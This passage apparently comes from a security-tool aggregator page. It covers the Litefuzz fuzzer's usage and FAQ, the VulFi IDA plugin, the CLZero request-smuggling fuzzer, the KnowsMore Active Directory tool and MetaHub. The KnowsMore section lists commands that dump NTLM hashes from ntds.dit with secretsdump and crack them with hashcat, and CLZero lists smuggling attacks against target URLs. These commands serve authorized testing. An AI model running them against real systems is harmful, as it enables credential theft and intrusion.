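            i += 1            # byte is needed to reproduce the crash
    return data

def supermin(data, crashes):
    # -mm: repeat whole passes until one removes nothing more
    while True:
        smaller = minimize(data, crashes)
        if len(smaller) == len(data):
            return smaller
        data = smaller
```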
minimization examples
litefuzz -l -c "latex2rtf FUZZ" -m test.tex -z
litefuzz -ls -c "./sc_serv shoutcast.conf" -a "tcp://localhost:8000" -m repro.http
supermin example
litefuzz -l -c "latex2rtf FUZZ" -mm crashes/latex2rtf/test.tex -z
...
[+] starting minimization
@ 582/582 (1 new crashes, 1145 -> 582 bytes, ~0:00:00 remaining)
[+] reduced crash @ pc=55555556c141 -> pc=55555557c57d to 582 bytes
[+] supermin activated, continuing...
@ 299/299 (1 new crashes, 582 -> 300 bytes, ~0:00:00 remaining)
[+] reduced crash @ pc=55555557c57d to 300 bytes
...
[+] reduced crash @ pc=555555562170 to 17 bytes
@ 17/17 (2 new crashes, 17 -> 17 bytes, ~0:00:00 remaining)
[+] achieved maximum minimization @ 17 bytes (test.min.tex)
[RESULTS]
completed (17) iterations with 2 new crashes found
command
--cmd allows a user to specify a command to run after each iteration. This can be used to clean up certain operations that would otherwise take up resources on the system.
litefuzz -l -c "/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter FUZZ" -i input/dmg --cmd "umount /Volumes/test.dir" --click -x 5 -n 100000 -ez
examples
local app
quick look
litefuzz -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -x 1 -n 100
--========================--
--======| litefuzz |======--
--========================--
[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 4
iterations: 100
mutator: random(mutators)
@ 100/100 (1 crashes, 4 duplicates, ~0:00:00 remaining)
[RESULTS]
> completed (100) iterations with (1) unique crashes and 4 dups
>> check crashes/latex2rtf dir for more details
enumerating file handlers on Ubuntu
$ cat /usr/share/applications/defaults.list
[Default Applications]
application/csv=libreoffice-calc.desktop
application/excel=libreoffice-calc.desktop
application/msexcel=libreoffice-calc.desktop
application/msword=libreoffice-writer.desktop
application/ogg=rhythmbox.desktop
application/oxps=org.gnome.Evince.desktop
application/postscript=org.gnome.Evince.desktop
....
fuzz the local tcpdump's pcap parsing (Linux)
litefuzz -l -c "tcpdump -r FUZZ" -i test-pcaps
fuzz Evince document reader (Linux GUI)
litefuzz -l -c "evince FUZZ" -i input/oxps -x 1 -n 10000
fuzz antiword (oldie but good test app :) (Linux)
litefuzz -l -c "antiword FUZZ" -i input/doc -ez
note: you can (and probably should) pass -z to enable Electric Fence (or fall back to glibc's feature) for heap error checking
enumerating file handlers on OS X
swda can enumerate file handlers on Mac.
$ ./swda getUTIs | grep -Ev "No application set"
com.adobe.encapsulated-postscript /System/Applications/Preview.app
com.adobe.flash.video /System/Applications/QuickTime Player.app
com.adobe.pdf /System/Applications/Preview.app
com.adobe.photoshop-image /System/Applications/Preview.app
....
fuzz gpg decryption via stdin with heap error checking (Mac)
litefuzz -l -c "gpg --decrypt" -i test-gpg -o crashes-gpg -z
fuzz Books app (Mac GUI)
litefuzz -l -c "/System/Applications/Books.app/Contents/MacOS/Books FUZZ" -i test-epub -t "/Users/test/Library/Containers/com.apple.iBooksX/Data" -x 8 -n 100000 -z
note: -z here enables Guard Malloc heap error checking in order to detect subtle heap corruption bugs
mac note
Some GUI targets may fail to be killed after each iteration's timeout and become unresponsive. To mitigate this, you can run a script like the one below in another terminal to periodically kill them in batch, reducing manual effort and monitoring; otherwise the fuzzing process may be affected.
#!/bin/bash
ps -Af | grep -ie "$1" | awk '{print $2}' | xargs kill -9
$ while :; do ./pkill.sh "Process Name /Users/test"; sleep 360; done
/Users/test (an example of the first part of the path where temp files are passed to the local GUI app; FUZZ becomes a path during execution) was chosen because you need a unique string to kill on; if you only use the process name, it will kill the fuzzing process too, as its command line also contains the process name.
enumerating file handlers on Windows
Using the AssocQueryString script with the assoc command can map file extensions to default applications.
C:\> .\AssocQueryString.ps1
...
.hlp :: C:\Windows\winhlp32.exe
.hta :: C:\Windows\SysWOW64\mshta.exe
.htm :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.html :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.icc :: C:\Windows\system32\colorcpl.exe
.icm :: C:\Windows\system32\colorcpl.exe
.imesx :: C:\Windows\system32\IME\SHARED\imesearch.exe
.img :: C:\Windows\Explorer.exe
.inf :: C:\Windows\system32\NOTEPAD.EXE
.ini :: C:\Windows\system32\NOTEPAD.EXE
.iso :: C:\Windows\Explorer.exe
When fuzzing on Windows, you may want to enable PageHeap and Memory Dumps for a better fuzzing experience (unless your target doesn't like them) prior to starting a new fuzzing run.
sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -z
sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump
Yes, run these commands using (g)sudo on Windows to easily elevate to Admin from the console and make the registry changes needed for these features. This also illustrates another nuance of enabling malloc debuggers for targets: on Linux and Mac, we're using runtime environment flags which need to be passed every time to enable the feature. On Windows, we're modifying the registry, so once the flag is passed the first time, one doesn't need to pass -z or --memdump in the fuzzing command line again (unless to disable or re-enable them).
fuzz PuTTY (puttygen) (Windows)
litefuzz -l -c "C:\Program Files (x86)\WinSCP\PuTTY\puttygen.exe FUZZ" -i input\ppk -x 0.5 -n 100000 -z
fuzz Adobe Reader like back in the day (Windows GUI)
litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -i pdfs -x 3 -n 100000 -z
(WinAppDbg only supports python 2, so must use py2 on Windows)
note: reminder that you can enable PageHeap for the target app via -z in an elevated prompt, or by using the sudo command provided by the gsudo win32 package that was installed during setup
litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -z
client
quick look
litefuzz -lk -c "ssh -T test@localhost -p 2222" -a tcp://localhost:2222 -i input/ssh-cli -o crashes/ssh -p -n 250000 -z glibc
--========================--
--======| litefuzz |======--
--========================--
[STATS]
run id: 9404
cmdline: ssh -T test@localhost -p 2222
address: tcp://localhost:2222
crash dir: crashes/ssh
input dir: input/ssh-cli
inputs: 4
iterations: 250000
mutator: random(mutators)
@ 73/250000 (0 crashes, 0 duplicates, ~1 day, 0:21:01 remaining)^C
resume? (y/n)> n
Terminated
...
cat /tmp/litefuzz/out
padding error: need 57895 block 8 mod 7
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect
local client
fuzz SNMP client on the localhost (Linux)
litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3
remote client
fuzz a remote FTP client (Linux)
while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done
litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -n 100
note: depending on the target, client fuzzing may require listening on a privileged port (1-1024). In this case, on Linux you can either setcap cap_net_bind_service=+ep on the python interpreter or use sudo when running the fuzzer; on Mac, just use sudo; and on Windows, run the fuzzer as Administrator to avoid any Permission Denied errors.
server
quick look
litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--
[STATS]
run id: 4001
cmdline: ./sc_serv shoutcast.conf
address: tcp://localhost:8000
crash dir: crashes/shoutcast
input dir: input/shoutcast
inputs: 3
iterations: 1000
mutator: random(mutators)
@ 1000/1000 (1 crashes, 7 duplicates, ~0:00:00 remaining)
[RESULTS]
> completed (1000) iterations with (1) unique crashes and 7 dups
>> check crashes/shoutcast for more details
local server
fuzz a local Shoutcast server
litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z
remote server
fuzz a remote SMTP server
litefuzz -s -a tcp://10.0.0.11:25 -i input/smtp-req -pp -n 10000
command line
usage: litefuzz.py [-h] [-l] [-k] [-s] [-c CMDLINE] [-i INPUTS] [-n ITERATIONS] [-x MAXTIME] [--mutator MUTATOR] [-a ADDRESS] [-o CRASHDIR] [-t TEMPDIR] [-f FUZZFILE]
[-m MINFILE] [-mm SUPERMIN] [-r REPROFILE] [-e] [-p] [-pp] [-u] [--nofuzz] [--key KEY] [--click] [--tls] [--golang] [--attach ATTACH] [--cmd CMD]
[--rmfile RMFILE] [--reportcrash REPORTCRASH] [--memdump] [--nomemdump] [-z [MALLOC]] [-zz] [-d]
optional arguments:
-h, --help show this help message and exit
-l, --local target will be executed locally
-k, --client target a network client
-s, --server target a network server
-c CMDLINE, --cmdline CMDLINE
target command line
-i INPUTS, --inputs INPUTS
input directory or file
-n ITERATIONS, --iterations ITERATIONS
number of fuzzing iterations (default: 1)
-x MAXTIME, --maxtime MAXTIME
timeout for the run (default: 1)
--mutator MUTATOR, --mutator MUTATOR
which mutator to use (default: 0=random)
-a ADDRESS, --address ADDRESS
server address in the ip:port format
-o CRASHDIR, --crashdir CRASHDIR
specify the directory to output crashes (default: crashes)
-t TEMPDIR, --tempdir TEMPDIR
specify the directory to output runtime fuzzing artifacts (default: OS tmp + run dir)
-f FUZZFILE, --fuzzfile FUZZFILE
specify the path and filename to place the fuzzed file (default: OS tmp + run dir + fuzz_random.ext)
-m MINFILE, --minfile MINFILE
specify a crashing file to generate a minimized version of it (bonus: may also find variant bugs)
-mm SUPERMIN, --supermin SUPERMIN
loops minimize to grind on until no more bytes can be removed
-r REPROFILE, --reprofile REPROFILE
specify a crashing file or directory to replay on the target
-e, --reuse enable second round fuzzing where any crashes found are reused as inputs
-p, --multibin use multiple requests or responses as inputs for fuzzing simple binary network sessions
-pp, --multistr use multiple requests or responses within input for fuzzing simple string-based network sessions
-u, --insulate only execute the target once and inside a debugger (eg. interactive clients)
--nofuzz, --nofuzz send input as-is without mutation (useful for debugging)
--key KEY, --key KEY send a particular key every iteration for interactive targets (eg. F5 for refresh)
--click, --click click the mouse (eg. position the cursor over target button to click beforehand)
--tls, --tls enable TLS for network fuzzing
--golang, --golang enable fuzzing of Golang binaries
--attach ATTACH, --attach ATTACH
attach to a local server process name (mac only)
--cmd CMD, --cmd CMD execute this command after each fuzzing iteration (eg. umount /Volumes/test.dir)
--rmfile RMFILE, --rmfile RMFILE
remove this file after every fuzzing iteration (eg. target won't overwrite output file)
--reportcrash REPORTCRASH, --reportcrash REPORTCRASH
use ReportCrash to help catch crashes for a specified process name (mac only)
--memdump, --memdump enable memory dumps (win32)
--nomemdump, --nomemdump
disable memory dumps (win32)
-z [MALLOC], --malloc [MALLOC]
enable malloc debug helpers (free bugs, but perf cost)
-zz, --nomalloc disable malloc debug helpers (eg. pageheap)
-d, --debug Turn on debug statements
trophies
Litefuzz has fuzzed crashes out of various software packages such as...
- antiword
- AppleScript (OS X)
- ArangoDB VelocyPack
- Avast authenticode-parser
- Avast RetDec
- BBC Audio Waveform
- ColorSync (OS X)
- Dynamsoft BarcodeReader
- eot2ttf
- evernote2md
- faad2
- Facebook's Origami Studio
- FontForge
- ForestDB
- Gifsicle
- GPUJPEG
- GPAC Multimedia Framework
- Google Draco
- GoPro GPR
- GtkRadiant
- IIPImage Server
- John The Ripper
- Kyoto Cabinet
- latex2rtf
- libMeshb
- libembroidery
- libsndfile
- Lion Vector Graphics (lvg)
- L-SMASH
- MindNode
- minimp4
- MiniWeb Server
- MLpack
- Nvidia Data Center GPU Manager
- Numbers (OS X)
- OpenJPEG
- OpenOrienteering Mapper
- OSM Express
- Pages (OS X)
- PBRT-Parser
- Pixar USD
- Remote Apple Events (OS X)
- Samsung rlottie
- Samsung ThorVG
- Shoutcast Server
- Silo
- syslog (OS X)
- Tencent NCNN
- TinyXML2
- UEFITool
- Ulfius Web Framework
- zlib
FAQ
how did this project come about?
Fuzzing is fun! And it's nice to do projects that take a contrarian view: fuzzers don't always have to follow the modern or popular approaches to get to the end goal of finding bugs. Whether you're close to bare metal, getting code coverage across all paths or simply optimizing for the fast and flexible, it's still the fundamental "invalidating assumptions" way of doing things. However it manifests, enjoy it.
is this project actively maintained?
Please do not expect active support or maintenance on the project. Feel free to fork it to add new features or fix bugs, etc. Perhaps even submit a PR for smaller things, although please have no expectations for responses or troubleshooting. Development on this repo is not intended to be active.
how do you know the fuzzer is working well and did you measure it against others?
The purpose of Litefuzz is to find bugs across platforms. And it does. So, honestly, the ability to measure it against fuzzerX or fuzzerY just didn't make the cut. Certain trade-offs were made and acknowledged at inception; see the intro for more details.
what would you change if you were to re-write it today?
It works pretty well as it is and has been tested on a ton of different targets and scenarios. That being said, it could benefit from standardizing on a more modular, plugin-based system where switching between targets and platforms didn't require as many additional checks in the operational side of the code. Having more formal tests and a deployment system that exercises it across the supported operating systems would also create an environment that is easier to work in when making changes to core functions. It grew from a small yet ambitious project into something a little bigger pretty quickly.
how stable is litefuzz?
The command line, GUI and network fuzzing (mostly on Linux and Mac), minimization, etc. have been tested pretty thoroughly and should be pretty solid overall. Some of the more exotic features, such as insulated network GUI fuzzing, ReportCrash support for Mac and some other niche features, should be considered experimental.
are there unsupported scenarios for litefuzz?
A few of them, yes. Most are either uncommon scenarios that are buggy, required more time and research to "get right" or just don't quite work for platform-related reasons. Many of them explicitly exit with an "unsupported" message when you try to run with such options, and some caveats have been mentioned in the sections above when describing various features. Some of the more nuanced ones: repro mode on insulated apps isn't supported; there's been limited testing of Mac apps using the insulate feature; Pyautogui seems to work fine on Linux and Windows, but on Mac it didn't prove very reliable, so consider it functionally unsupported there; and client fuzzing on Windows can be a little less reliable than other modes on other platforms.
There may be some edge cases here and there, but the most common local and network fuzzing scenarios have been tested and are working. Ah, the joys of writing cross-platform tooling: rewarding, but it's hard to make everything work great all the time. Overall, fuzzing on Linux/Mac seems to be more stable and supports more features, especially as network fuzzing has had much more testing there than on Windows, but an effort was made for at least the basics to be available on Win32, with a couple of extras.
Feel free to fork this fuzzer and make such improvements, support the currently unsupported, etc., or send PRs for more minor but useful stuff.
what guarantees are given for this project or its code?
Absolutely none. But it's pretty fun to fuzz and watch it hand you bugs.
author / references
- KitPloit - PenTest & Hacking Tools
- VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries
VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries
The VulFi (Vulnerability Finder) tool is a plugin to IDA Pro which can be used to assist during bug hunting in binaries. Its main objective is to provide a single view with all cross-references to the most interesting functions (such as strcpy
, sprintf
, system
, etc.). For cases where a Hexrays decompiler can be used, it will attempt to rule out calls to these functions which are not interesting from a vulnerability research perspective (think something like strcpy(dst,"Hello World!")
). Without the decompiler, the rules are much simpler (to not depend on architecture) and thus only rule out the most obvious cases.
Installation
Place the vulfi.py
, vulfi_prototypes.json
and vulfi_rules.json
files in the IDA plugin folder (cp vulfi* <IDA_PLUGIN_FOLDER>
).
Preparing the Database File
Before you run VulFi make sure that you have a good understanding of the binary that you work with. Try to identify all standard functions (strcpy
, memcpy
, etc.) and name them accordingly. The plugin is case insensitive and thus MEMCPY
, Memcpy
and memcpy
are all valid names. However, note that the search for the function requires exact match. This means that memcpy?
or std_memcpy
(or any other variant) will not be detected as a standard function and therefore will not be considered when looking for potential vulnerabilities. If you are working with an unknown binary you need to set the compiler options first Options
> Compiler
. After that VulFi will do its best to filter all obvious false positives (such as call to printf
with constant string as a first parameter). Please note that while the plugin is made without any ties to a specific ar chitecture some processors do not have full support for specifying types and in such case VulFi will simply mark all cross-references to potentially dangerous standard functions to allow you to proceed with manual analysis. In these cases, you can benefit from the tracking features of the plugin.
Usage
Scanning
To initiate the scan, select Search
> VulFi
option from the top bar menu. This will either initiate a new scan, or it will read previous results stored inside the idb
/i64
file. The data are automatically saved whenever you save the database.
Once the scan is completed or once the previous results are loaded a table will be presented with a view containing following columns:
- IssueName - Used as a title for the suspected issue.
- FunctionName - Name of the function.
- FoundIn - The function that contains the potentially interesting reference.
- Address - The address of the detected call.
-
Status - The review status, initial
Not Checked
is assigned to every new item. The other statuses areFalse Positive
,Suspicious
andVulnerable
. Those can be set using a right-click menu on a given item and should reflect the results of the manual review of the given function call. -
Priority - An attempt to prioritize more interesting calls over the less interesting ones. Possible values are
High
,Medium
andLow
. The priorities are defined along with other rules invulfi_rules.json
file. - Comment - A user defined comment for the given item.
In case that there are no data inside the idb
/i64
file or user decides to perform a new scan. The plugin will ask whether it should run the scan using the default included rules or whether it should use a custom rules file. Please note that running a new scan with already existing data does not overwrite the previously found items identified by the rule with the same name as the one with previously stored results. Therefore, running the scan again does not delete existing comments and status updates.
In the right-click context menu within the VulFi view, you can also remove the item from the results or remove all items. Please note that any comments or status updates will be lost after performing this operation.
Investigation
Whenever you would like to inspect the detected instance of a possible vulnerable function, just double-click anywhere in the desired row and IDA will take you to the memory location which was identified as potentially interesting. Using a right-click and option Set Vulfi Comment
allows you to enter comment for the given instance (to justify the status for example).
Adding More Functions
The plugin also allows for creating custom rules. These rules could be defined in the IDA interface (ideal for single functions) or supplied as a custom rule file (ideal for rules that aim to cover multiple functions).
Within the Interface
When you would like to trace a custom function identified during the analysis, just switch the IDA View to that function, right-click anywhere within its body and select Add current function to VulFi.
Custom Set of Rules
It is also possible to load a custom file with a set of multiple rules. To create a custom rule file with the structure below, you can use the included template file here.
[ // An array of rules
{
"name": "RULE NAME", // The name of the rule
"alt_names":[
"function_name_to_look_for" // List of all function names that should be matched against the conditions defined in this rule
],
"wrappers":true, // Look for wrappers of the above functions as well (note that the wrapped function has to also match the rule)
"mark_if":{
"High":"True", // If evaluates to True, mark with priority High (see Rules below)
"Medium":"False", // If evaluates to True, mark with priority Medium (see Rules below)
"Low": "False" // If evaluates to True, mark with priority Low (see Rules below)
}
}
]
An example rule that looks for all cross-references to the function malloc and checks whether its parameter is not constant and whether the return value of the function is checked is shown below:
{
"name": "Possible Null Pointer Dereference",
"alt_names":[
"malloc",
"_malloc",
".malloc"
],
"wrappers":false,
"mark_if":{
"High":"not param[0].is_constant() and not function_call.return_value_checked()",
"Medium":"False",
"Low": "False"
}
}
Rules
Available Variables
- param[<index>]: Used to access a parameter of the function call (index starts at 0)
- function_call: Used to access the function call event
- param_count: Holds the count of parameters that were passed to the function
Available Functions
- Is parameter a constant: param[<index>].is_constant()
- Get numeric value of parameter: param[<index>].number_value()
- Get string value of parameter: param[<index>].string_value()
- Is parameter set to null after the call: param[<index>].set_to_null_after_call()
- Is return value of a function checked: function_call.return_value_checked(<constant_to_check>)
Examples
- Mark all calls to a function where the third parameter is > 5: param[2].number_value() > 5
- Mark all calls to a function where the second parameter contains "%s": "%s" in param[1].string_value()
- Mark all calls to a function where the second parameter is not constant: not param[1].is_constant()
- Mark all calls to a function where the return value is validated against a value equal to the number of parameters: function_call.return_value_checked(param_count)
- Mark all calls to a function where the return value is validated against any value: function_call.return_value_checked()
- Mark all calls to a function where none of the parameters starting from the third are constants: all(not p.is_constant() for p in param[2:])
- Mark all calls to a function where any of the parameters are constant: any(p.is_constant() for p in param)
- Mark all calls to a function: True
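These mark_if conditions are plain Python expressions evaluated by the plugin, so you can sanity-check a candidate expression outside of IDA before adding it to vulfi_rules.json. The following is a minimal sketch using hypothetical Param and FunctionCall mocks that stand in for the objects VulFi provides; only the expression syntax is taken from the rules above.

# Minimal sketch for dry-running VulFi-style rule expressions outside IDA.
# Param and FunctionCall are hypothetical mocks, not the plugin's real classes.
class Param:
    def __init__(self, constant=False, number=None, string=""):
        self._constant, self._number, self._string = constant, number, string
    def is_constant(self):
        return self._constant
    def number_value(self):
        return self._number
    def string_value(self):
        return self._string

class FunctionCall:
    def __init__(self, checked=False):
        self._checked = checked
    def return_value_checked(self, against=None):
        return self._checked

# Simulate a call like malloc(user_len) whose return value is never tested.
param = [Param(constant=False)]
param_count = len(param)
function_call = FunctionCall(checked=False)

rule = "not param[0].is_constant() and not function_call.return_value_checked()"
print(eval(rule))  # True -> this call would be marked with High priority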
Issues and Warnings
- When you request a parameter with an index that is out of bounds, any call to the function will be marked with Low priority. This is a way to avoid missing cross-references where it was not possible to correctly get all parameters (this mainly applies to disassembly mode).
- When you search within the VulFi view, switch context out of the view and come back, the view will not load. You can solve this by terminating the search operation before switching the context, by moving the VulFi view to a side view so that it is always visible, or by closing and re-opening the view (no data will be lost).
- Scans of more exotic architectures end with a lot of false positives.
- KitPloit - PenTest & Hacking Tools
- CLZero - A Project For Fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors
CLZero - A Project For Fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors
A project for fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors.
About
Thank you to @albinowax, @defparam and @d3d, without whom this tool would not exist. Inspired by the tool Smuggler; all attack gadgets were adapted from Smuggler and https://portswigger.net/research/how-to-turn-security-research-into-profit
For more info see: https://moopinger.github.io/blog/fuzzing/clzero/tools/request/smuggling/2023/11/15/Fuzzing-With-CLZero.html
Usage
usage: clzero.py [-h] [-url URL] [-file FILE] [-index INDEX] [-verbose] [-no-color] [-resume] [-skipread] [-quiet] [-lb] [-config CONFIG] [-method METHOD]
CLZero by Moopinger
optional arguments:
-h, --help show this help message and exit
-url URL (-u), Single target URL.
-file FILE (-f), Files containing multiple targets.
-index INDEX (-i), Index start point when using a file list. Default is first line.
-verbose (-v), Enable verbose output.
-no-color Disable colors in HTTP Status
-resume Resume scan from last index place.
-skipread Skip the read response on smuggle requests, recommended. This will save a lot of time between requests. Ideal for targets with standard HTTP traffic.
-quiet (-q), Disable output. Only successful payloads will be written to ./payloads/
-lb Last byte sync method for least request latency. Due to the nature of the request, it cannot guarantee that the smuggle request will be processed first. Ideal for targets with a high amount of traffic, and you do not mind sending multiple requests.
-config CONFIG (-c) Config file to load, see ./configs/ to create custom payloads
-method METHOD (-m) Method to use when sending the smuggle request. Default: POST
Single target attack:
- python3 clzero.py -u https://www.target.com/ -c configs/default.py -skipread
- python3 clzero.py -u https://www.target.com/ -c configs/default.py -lb
Multi target attack:
- python3 clzero.py -f urls.txt -c configs/default.py -skipread
- python3 clzero.py -f urls.txt -c configs/default.py -lb
Install
git clone https://github.com/Moopinger/CLZero.git
cd CLZero
pip3 install -r requirements.txt
- KitPloit - PenTest & Hacking Tools
- KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)
KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)
KnowsMore officially supports Python 3.8+.
Main features
- Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
- Import NTLM Hashes from NTDS.dit and SYSTEM
- Import Cracked NTLM hashes from hashcat output file
- Import BloodHound ZIP or JSON file
- BloodHound importer (import JSON to Neo4J without BloodHound UI)
- Analyse the quality of passwords (length, lowercase, uppercase, digits, special and latin characters)
- Analyse the similarity of passwords to the company and user names
- Search for users, passwords and hashes
- Export all cracked credentials directly to the BloodHound Neo4j database as 'owned objects'
- Other amazing features...
Getting stats
knowsmore --stats
This command will produce several statistics about the passwords, like the output below
KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore
[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db
[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+
[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+
[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+
Installation
Simple
pip3 install --upgrade knowsmore
Note: If you face problems with dependency versions, check the Virtual ENV file
Execution Flow
There is no mandatory order for importing data, but to get better correlation we suggest the following execution flow:
- Create database file
- Import BloodHound files
- Domains
- GPOs
- OUs
- Groups
- Computers
- Users
- Import NTDS file
- Import cracked hashes
Create database file
All data are stored in a SQLite Database
knowsmore --create-db
Importing BloodHound files
We can import all full BloodHound files into KnowsMore, correlate the data, and sync it to the Neo4j BloodHound database. This way you can use KnowsMore alone to import JSON files directly into the Neo4j database instead of using the extremely slow BloodHound user interface.
# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip
# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json
Note: KnowsMore can import both BloodHound ZIP and JSON files, but we recommend using the ZIP file, because KnowsMore will automatically order the files for better data correlation.
Sync data to Neo4j BloodHound database
# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678
Note: The KnowsMore implementation of the BloodHound importer was inspired by the Fox-IT BloodHound Import implementation. We implemented several changes to save all data in the KnowsMore SQLite database and then do an incremental sync to the Neo4j database. This strategy has several benefits, such as being at least 10x faster than the original BloodHound user interface.
Importing NTDS file
Option 1
Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry
knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM
Option 2
Note: First use secretsdump to extract the NTDS hashes with the command below
secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name
After that import
knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds
Generating a custom wordlist
knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name
Importing cracked hashes
Cracking hashes
First extract all hashes to a txt file
# Extract NTLM hashes to file
knowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"
# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt
In order to crack the hashes, I usually use hashcat with the command below
# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"
# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a
Importing hashcat output file
knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt
Note: Change clientCompanyName to the name of your company
Wipe sensitive data
As passwords and their hashes are extremely sensitive data, there is a module to replace the clear-text passwords and respective hashes.
Note: This command will keep all generated statistics and imported user data.
knowsmore --wipe
BloodHound Mark as owned
One User
During an assessment you can find user passwords in several ways, and you can add them to the KnowsMore database
knowsmore --user-pass --username administrator --password Sec4US@2023
# or adding the company name
knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us
Integrate all cracked credentials into the Neo4j BloodHound database
knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456
For remote connections, make sure that the Neo4j database server accepts remote connections. Change the line below in the config file /etc/neo4j/neo4j.conf and restart the service.
server.bolt.listen_address=0.0.0.0:7687
- KitPloit - PenTest & Hacking Tools
- Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management
Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management
MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.
MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs (YOUR context), identifying ownership, and calculating an impact score based on it that you can use for defining prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanner (like Prowler).
MetaHub describes your context by connecting to the affected resources in the affected accounts. It can describe information about your AWS account and organization, the affected resource's tags, the related CloudTrail events, the affected resource's configuration, and all of its associations: if you are contextualizing a security finding affecting an EC2 instance, MetaHub will not only connect to that instance itself but also to its IAM roles; from there, it will connect to the IAM policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the subnets where the instance is running, the volumes, the Auto Scaling groups, and more.
After fetching all the information from your context, MetaHub will evaluate certain important conditions for all your resources: exposure, access, encryption, status, environment and application. Based on those calculations, and in addition to the information from all the security findings affecting the resource, MetaHub will generate a score for each finding.
Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.
You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.
